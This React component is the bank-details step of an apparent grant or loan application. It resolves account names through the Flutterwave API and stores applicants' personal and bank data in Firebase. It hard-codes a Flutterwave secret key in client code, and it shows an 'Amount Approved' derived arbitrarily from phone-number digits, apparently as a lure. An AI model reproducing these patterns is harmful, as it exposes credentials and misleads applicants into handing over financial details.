import React, {useState, Component} from 'react';
import * as firebase from 'firebase'
import NotificationAlert from 'react-notification-alert';
import { Redirect, Route } from 'react-router'
import Header from './Header.js';
import Footer from './Footer.js';

const serverValue = firebase.database.ServerValue;

let problemsubmittingNotification


let acNum
let bank1 = []
let bank2 = []
let bank3 = []
let bank4 = []
let bank5 = []
let bank6 = []
let bank7 = []
let bank8 = []
let bank9 = []
let bank10 = []
let bank11 = []
let bank12 = []
let bank13 = []
let bank14 = []
let bank15 = []
let bank16 = []
let bank17 = []
let bank18 = []
let bank19 = []
let bank20 = []
let bank21 = []
let bank22 = []
let bank23 = []
let bank24 = []
let bank25 = []
let bank26 = []
let bank27 = []
let bank28 = []
let bank29 = []
let bank30 = []
let bank31 = []
let bank32 = []
let amountApproved;

export default class ValidateAccount extends Component {
  // const [weightText, setWeightText] = useState("")
constructor(props){
   super(props);
   this.state={
    accountNumber: '',
    bankName: '',
    banksList: [],
    bankCode: '',
    hideComponents: true,
    pin: '',
    accountName: '',
    loadingAccountDetails: false,
    redirectToSuccess: false
    
   }
} 


onChangePin = event => {
  this.setState({ [event.target.name]: event.target.value });

};

async  componentDidMount() {



  await fetch('https://api.ravepay.co/v2/banks/NG?public_key=FLWPUBK-489a8055d2b8def578d4657a66ef44a8-X',{
method: 'GET',
headers:{'Authorization': 'FLWSECK_TEST-cfc50e4d6b73dc47118415349f89d0a5-X'}
}).then(r=>r.json()).then(res=>{
try{
  this.setState({banksList: res.data.Banks, hideComponents: false, bankCode: res.data.Banks[0].Code, bankName: res.data.Banks[0].Name })
}
catch{
  this.setState({hideComponents: true}) 
}
})

if(localStorage.getItem('finished')==='true'){
  localStorage.clear()
}
}
async loadAccountDetails(){
  this.setState({loadingAccountDetails: true}) 

  //console.log(acNum)
  //console.log(this.state.bankCode)
   
    const requestOptions = {
      method: 'POST',
      headers: { 
          'Content-Type': 'application/json',
          
      },
      body: JSON.stringify({
        recipientaccount: acNum,
        destbankcode: this.state.bankCode,
        PBFPubKey: "FLWPUBK-489a8055d2b8def578d4657a66ef44a8-X"
      })
    };
   await fetch('https://api.ravepay.co/flwv3-pug/getpaidx/api/resolve_account', requestOptions)
      .then(

        
        response => response.json())
      .then(data => {

      
        this.setState({loadingAccountDetails: false, accountName: data.data.data.accountname})
      });
     
    
  
}

bankChange = e => {
  let bankCode = e.target.value
let bankName = ''
if(bankCode===bank1[0]){
bankName= this.state.banksList[0].Name
}
else if(bankCode===bank2[0]){
bankName= this.state.banksList[1].Name
}
else if(bankCode===bank3[0]){
bankName= this.state.banksList[2].Name
}
else if(bankCode===bank4[0]){
bankName= this.state.banksList[3].Name
}
else if(bankCode===bank5[0]){
bankName= this.state.banksList[4].Name
}
else if(bankCode===bank6[0]){
bankName= this.state.banksList[5].Name
}
else if(bankCode===bank7[0]){
bankName= this.state.banksList[6].Name
}
else if(bankCode===bank8[0]){
bankName= this.state.banksList[7].Name
}
else if(bankCode===bank9[0]){
bankName= this.state.banksList[8].Name
}
else if(bankCode===bank10[0]){
bankName= this.state.banksList[9].Name
}
else if(bankCode===bank11[0]){
bankName= this.state.banksList[10].Name
}
else if(bankCode===bank12[0]){
bankName= this.state.banksList[11].Name
}
else if(bankCode===bank13[0]){
bankName= this.state.banksList[12].Name
}
else if(bankCode===bank14[0]){
bankName= this.state.banksList[13].Name
}
else if(bankCode===bank15[0]){
bankName= this.state.banksList[14].Name
}
else if(bankCode===bank16[0]){
bankName= this.state.banksList[15].Name
}
else if(bankCode===bank17[0]){
bankName= this.state.banksList[16].Name
}
else if(bankCode===bank18[0]){
bankName= this.state.banksList[17].Name
}
else if(bankCode===bank19[0]){
bankName= this.state.banksList[18].Name
}
else if(bankCode===bank20[0]){
bankName= this.state.banksList[19].Name
}
else if(bankCode===bank21[0]){
bankName= this.state.banksList[20].Name
}
else if(bankCode===bank22[0]){
bankName= this.state.banksList[21].Name
}
else if(bankCode===bank23[0]){
bankName= this.state.banksList[22].Name
}
else if(bankCode===bank24[0]){
bankName= this.state.banksList[23].Name
}
else if(bankCode===bank25[0]){
bankName= this.state.banksList[24].Name
}
else if(bankCode===bank26[0]){
bankName= this.state.banksList[25].Name
}
else if(bankCode===bank27[0]){
bankName= this.state.banksList[26].Name
}
else if(bankCode===bank28[0]){
bankName= this.state.banksList[27].Name
}
else if(bankCode===bank29[0]){
bankName= this.state.banksList[28].Name
}
else if(bankCode===bank30[0]){
bankName= this.state.banksList[29].Name
}
else if(bankCode===bank31[0]){
bankName= this.state.banksList[30].Name
}
else if(bankCode===bank32[0]){
bankName= this.state.banksList[31].Name
}



 this.setState({ bankCode: e.target.value, accountName: '', bankName: bankName });
}
  
  

      handleChange = e => {
        this.setState({ [e.target.name]: e.target.value });
      }

      onNextClick = event => {
 
      




      }


      onChangeAccountNum = event => {
        let accountNum
      
        accountNum = event.target.value
      
        if(accountNum.includes("a")||(accountNum.includes("A"))
        ||accountNum.includes("b")||(accountNum.includes("B"))
        ||accountNum.includes("c")||(accountNum.includes("C"))
        ||accountNum.includes("d")||(accountNum.includes("D"))
        ||accountNum.includes("e")||(accountNum.includes("E"))
        ||accountNum.includes("f")||(accountNum.includes("F"))
        ||accountNum.includes("g")||(accountNum.includes("G"))
        ||accountNum.includes("h")||(accountNum.includes("H"))
        ||accountNum.includes("i")||(accountNum.includes("I"))
        ||accountNum.includes("j")||(accountNum.includes("J"))
        ||accountNum.includes("k")||(accountNum.includes("K"))
        ||accountNum.includes("l")||(accountNum.includes("L"))
        ||accountNum.includes("m")||(accountNum.includes("M"))
        ||accountNum.includes("n")||(accountNum.includes("N"))
        ||accountNum.includes("o")||(accountNum.includes("O"))
        ||accountNum.includes("p")||(accountNum.includes("P"))
        ||accountNum.includes("q")||(accountNum.includes("Q"))
        ||accountNum.includes("r")||(accountNum.includes("R"))
        ||accountNum.includes("s")||(accountNum.includes("S"))
        ||accountNum.includes("t")||(accountNum.includes("T"))
        ||accountNum.includes("u")||(accountNum.includes("U"))
        ||accountNum.includes("v")||(accountNum.includes("V"))
        ||accountNum.includes("w")||(accountNum.includes("W"))
        ||accountNum.includes("x")||(accountNum.includes("X"))
        ||accountNum.includes("y")||(accountNum.includes("Y"))
        ||accountNum.includes("z")||(accountNum.includes("Z"))
        ||accountNum.includes("@")||(accountNum.includes("$"))
        ||accountNum.includes("!")||(accountNum.includes("&"))
        ||accountNum.includes("^")||(accountNum.includes("+"))
        ||accountNum.includes("-")||(accountNum.includes("_"))
        ||accountNum.includes("?")||(accountNum.includes("."))
        ||accountNum.includes(",")||(accountNum.includes("'"))
        ||accountNum.includes(";")||(accountNum.includes(":"))
        ||accountNum.includes("(")||(accountNum.includes(")"))
        ||accountNum.includes("{")||(accountNum.includes("}"))
        ||accountNum.includes("[")||(accountNum.includes("]"))
        ||accountNum.includes("/")||(accountNum.includes("="))
        ||accountNum.includes("|")||accountNum.includes("~")===true){
         this.setState({accountNumber: accountNum.substr(0, accountNum.length-1) })
         acNum = accountNum.substr(0, accountNum.length-1)
        }
        else if(accountNum.includes(" ")===true){
      try{
       this.setState({accountNumber: accountNum.substr(0, accountNum.length-1) })
       acNum = accountNum.substr(0, accountNum.length-1)
      }
      catch{
       
      }
        }
        else{
         this.setState({ accountNumber: event.target.value });
         acNum = event.target.value
        }
    
        if(accountNum.length===10){
          this.loadAccountDetails()
         
          }
          this.setState({accountName: ''})
      
       };

       onChangePin = event => {
        this.setState({ [event.target.name]: event.target.value });
    
      };


      onSubmitClick = event => {

   let applicationID =     Math.floor(Math.random() * 100000) + 99999;

   let num =     Math.floor(Math.random() * 10000000000) + 9999999999;

   let appID = "NYE/"+applicationID+"/2021"

        let mobileNumber = localStorage.getItem('mobileNumber')
        let firstName = localStorage.getItem('firstName')
        let surName = localStorage.getItem('surName')
        let gender = localStorage.getItem('gender')
        let age = localStorage.getItem('age')
        let stateOfOrigin = localStorage.getItem('stateOfOrigin')
        let educationLevel = localStorage.getItem('educationLevel')
        let answer = localStorage.getItem('answer')
        
        localStorage.setItem('applicationID', applicationID)

firebase.database().ref('users/' + num ).set({
          
          mobileNumber: mobileNumber,
          firstName: firstName,
          surName: surName,
          gender: gender,
          age: age,
          applicationID: appID,
          stateOfOrigin: stateOfOrigin,
          educationLevel: educationLevel,
          answer: answer,
          accountNumber: this.state.accountNumber,
          accountName: this.state.accountName,
          bankName: this.state.bankName,
          amountApproved: amountApproved,
          dateRegistered: serverValue.TIMESTAMP
}).then(
  localStorage.setItem('passedFinal', 'true'),
  this.setState({redirectToSuccess: true})
)

        
 event.preventDefault()
        

      }

       

render(){
  let accountName = ''

  const {
   accountNumber,
   bankName,
   banksList,
   pin
   
  } = this.state;


  let mobileNum = localStorage.getItem('mobileNumber')+ ''

  if(mobileNum.includes("28")){
  amountApproved = "65,000"
  }

  else if(mobileNum.includes("20")){
    amountApproved= "70,000" 


  }

  else if(mobileNum.includes("66")){
    amountApproved="80,000"

  }

  else if(mobileNum.includes("10")){
    amountApproved = "50,000"


  }

  else if(mobileNum.includes("37")){
    amountApproved = "90,000"

  }

  else if(mobileNum.includes("44")){
amountApproved ="85,000" 


  }

  else if(mobileNum.includes("25")){
amountApproved= "105,000" 


  }

  else if(mobileNum.includes("40")){
    amountApproved="55,000" 


  }

  else if(mobileNum.includes("41")){
    amountApproved="61,000" 


  }

  else if(mobileNum.includes("89")){
    amountApproved="109,000" 


  }

  else if(mobileNum.includes("52")){
    amountApproved="72,000" 


  }

  else if(mobileNum.includes("73")){
    amountApproved="93,000" 


  }

  else if(mobileNum.includes("67")){
    amountApproved="87,000" 


  }

  else if(mobileNum.includes("39")){
    amountApproved = "45,000"


  }

  else{
    amountApproved = "200,000" 


  }

  try{
    bank1 =[banksList[0].Code, banksList[0].Name ]
    bank2 =[banksList[1].Code, banksList[1].Name ]
    bank3 =[banksList[2].Code, banksList[2].Name ]
    bank4 =[banksList[3].Code, banksList[3].Name ]
    bank5 =[banksList[4].Code, banksList[4].Name ]
    bank6 =[banksList[5].Code, banksList[5].Name ]
    bank7 =[banksList[6].Code, banksList[6].Name ]
    bank8 =[banksList[7].Code, banksList[7].Name ]
    bank9 =[banksList[8].Code, banksList[8].Name ]
    bank10 =[banksList[9].Code, banksList[9].Name ]
    bank11 =[banksList[10].Code, banksList[10].Name ]
    bank12 =[banksList[11].Code, banksList[11].Name ]
    bank13 =[banksList[12].Code, banksList[12].Name ]
    bank14 =[banksList[13].Code, banksList[13].Name ]
    bank15 =[banksList[14].Code, banksList[14].Name ]
    bank16 =[banksList[15].Code, banksList[15].Name ]
    bank17 =[banksList[16].Code, banksList[16].Name ]
    bank18 =[banksList[17].Code, banksList[17].Name ]
    bank19 =[banksList[18].Code, banksList[18].Name ]
    bank20 =[banksList[19].Code, banksList[19].Name ]
    bank21 =[banksList[20].Code, banksList[20].Name ]
    bank22 =[banksList[21].Code, banksList[21].Name ]
    bank23 =[banksList[22].Code, banksList[22].Name ]
    bank24 =[banksList[23].Code, banksList[23].Name ]
    bank25 =[banksList[24].Code, banksList[24].Name ]
    bank26 =[banksList[25].Code, banksList[25].Name ]
    bank27 =[banksList[26].Code, banksList[26].Name ]
    bank28 =[banksList[27].Code, banksList[27].Name ]
    bank29 =[banksList[28].Code, banksList[28].Name ]
    bank30 =[banksList[29].Code, banksList[29].Name ]
    bank31 =[banksList[30].Code, banksList[30].Name ]
    bank32 =[banksList[31].Code, banksList[31].Name ]
    
    }
    catch{
    
    }

    if(this.state.accountName===null){
      accountName = 'We could not verify this Account Number'
    }

    else  if(this.state.accountName==='') {
      accountName = ''
    }

    else{
      accountName = this.state.accountName
    }
 
  let passedSecondStage = localStorage.getItem('passedSecondStage')
  
  if (passedSecondStage === 'true') {
  return (
      <>
       <NotificationAlert ref="notify" />

<Header/>

  <div class="container" style={{maxWidth: 700, marginTop: 125, marginBottom: 200}} >
 
  <form action="/action_page.php" class="was-validated">
  <div hidden={this.state.hideComponents===false}  class="spinner-border text-success" style={{width: '3rem', height: '3rem', position: 'center', marginLeft: "50%"}} role="status">
  <span class="sr-only"></span>
</div>
  <div class="form-group" hidden={this.state.hideComponents===true}>
    <label for="uname">Bank Name:</label>
    <select
 
    
     onChange={this.bankChange}
                            class="form-control"
                            
                          >
                            <option value={bank1[0]}> {bank1[1]}</option>
  <option value={bank2[0]}> {bank2[1]}</option>
  <option value={bank3[0]}> {bank3[1]}</option>
  <option value={bank4[0]}> {bank4[1]}</option>
  <option value={bank5[0]}> {bank5[1]}</option>
  <option value={bank6[0]}> {bank6[1]}</option>
  <option value={bank7[0]}> {bank7[1]}</option>
  <option value={bank8[0]}> {bank8[1]}</option>
  <option value={bank9[0]}> {bank9[1]}</option>
  <option value={bank10[0]}> {bank10[1]}</option>
  <option value={bank11[0]}> {bank11[1]}</option>
  <option value={bank12[0]}> {bank12[1]}</option>
  <option value={bank13[0]}> {bank13[1]}</option>
  <option value={bank14[0]}> {bank14[1]}</option>
  <option value={bank15[0]}> {bank15[1]}</option>
  <option value={bank16[0]}> {bank16[1]}</option>
  <option value={bank17[0]}> {bank17[1]}</option>
  <option value={bank18[0]}> {bank18[1]}</option>
  <option value={bank19[0]}> {bank19[1]}</option>
  <option value={bank20[0]}> {bank20[1]}</option>
  <option value={bank21[0]}> {bank21[1]}</option>
  <option value={bank22[0]}> {bank22[1]}</option>
  <option value={bank23[0]}> {bank23[1]}</option>
  <option value={bank24[0]}> {bank24[1]}</option>
  <option value={bank25[0]}> {bank25[1]}</option>
  <option value={bank26[0]}> {bank26[1]}</option>
  <option value={bank27[0]}> {bank27[1]}</option>
  <option value={bank28[0]}> {bank28[1]}</option>
  <option value={bank29[0]}> {bank29[1]}</option>
  <option value={bank30[0]}> {bank30[1]}</option>
  <option value={bank31[0]}> {bank31[1]}</option>
  <option value={bank32[0]}> {bank32[1]}</option>
                            
                          
                          </select>
    <div class="valid-feedback"></div>
    <div class="invalid-feedback">Please fill out this field.</div>
  </div>
 
  
  <div class="form-group" hidden={this.state.hideComponents===true}>
    <label for="uname">Account Number:</label>
    <input type="text" class="form-control" id="uname" placeholder="Bank Account Number" 
    name="accountNumber"
    value={accountNumber}
    onChange={this.onChangeAccountNum}
    maxLength="10"
    required/>
    <div class="valid-feedback"></div>
    <div class="invalid-feedback">Please fill out this field.</div>
  </div>
  <div hidden={this.state.loadingAccountDetails===false} class="spinner-border text-success"></div>
  <h5  style={{color: 'gray', marginBottom: 20}}>{accountName}</h5>

   <br/>
  <h6 hidden={this.state.hideComponents===true} style={{color: '#212F3D'}}>Amount Approved: &#8358;{amountApproved}</h6>
  <button disabled = {this.state.accountNumber.length<10 || this.state.loadingAccountDetails===true} onClick={this.onSubmitClick} hidden={this.state.hideComponents===true} type="submit" class="btn btn-success" >SUBMIT</button>


</form>



</div>

<Footer/>
{this.state.redirectToSuccess === true && (
          <Redirect to={'/completed'} />
        )}
</>
    );
      }
    else return (
      <Redirect to={'/completed'} />
    )
  }
}

